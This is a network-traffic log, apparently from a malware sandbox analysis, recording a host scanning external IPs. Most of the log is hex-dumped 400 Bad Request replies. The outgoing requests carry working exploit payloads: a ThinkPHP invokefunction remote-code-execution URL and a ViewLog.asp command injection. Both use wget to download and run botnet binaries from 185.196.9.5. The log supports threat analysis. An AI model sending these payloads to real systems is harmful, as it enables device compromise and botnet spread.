3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:06.680048943 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:05 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:07.310513020 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:05 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:08.436513901 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:05 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:10.682120085 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:05 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:15.104010105 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:05 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>
Feb 25, 2024 19:04:23.992597103 CET	629	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:05 GMT Server: Apache/2.4.58 (Unix) Content-Length: 437 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p><hr><address>Apache/2.4.58 (Unix) Server at localhost Port 8080</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
669	192.168.2.15	37966	112.78.112.53	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.166969061 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:06.430092096 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:06 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
670	192.168.2.15	46766	112.133.133.251	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.204366922 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
671	192.168.2.15	36080	94.121.125.176	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.227277994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
672	192.168.2.15	46454	112.50.197.229	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.298423052 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:06.692848921 CET	313	IN	HTTP/1.1 400 Bad Request Server: CloudWAF Date: Sun, 25 Feb 2024 18:04:06 GMT Content-Type: text/html Content-Length: 153 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 57 41 46 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>CloudWAF</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
673	192.168.2.15	46482	94.20.183.93	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.463932037 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
674	192.168.2.15	45308	94.193.187.163	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.911647081 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
675	192.168.2.15	43562	85.201.161.100	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.914925098 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
676	192.168.2.15	39756	94.122.10.21	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.954492092 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
677	192.168.2.15	52032	94.123.76.60	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:06.954596996 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
678	192.168.2.15	56138	94.141.81.171	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:07.140131950 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:07.410612106 CET	133	IN	HTTP/1.1 404 Not Found Content-Length: 50 Content-Type: text/html Data Raw: 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 4e 6f 20 63 6f 6e 74 65 78 74 20 66 6f 75 6e 64 20 66 6f 72 20 72 65 71 75 65 73 74 Data Ascii: <h1>404 Not Found</h1>No context found for request

Session ID	Source IP	Source Port	Destination IP	Destination Port
679	192.168.2.15	45322	94.193.187.163	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:07.271697998 CET	303	IN	HTTP/1.1 400 Bad Request Server: sky_router X-Frame-Options: Deny Cache-Control: no-cache Date: Sun, 25 Feb 2024 18:04:06 GMT Content-Type: text/html Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
680	192.168.2.15	40964	112.197.40.190	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:08.036770105 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:08.525837898 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
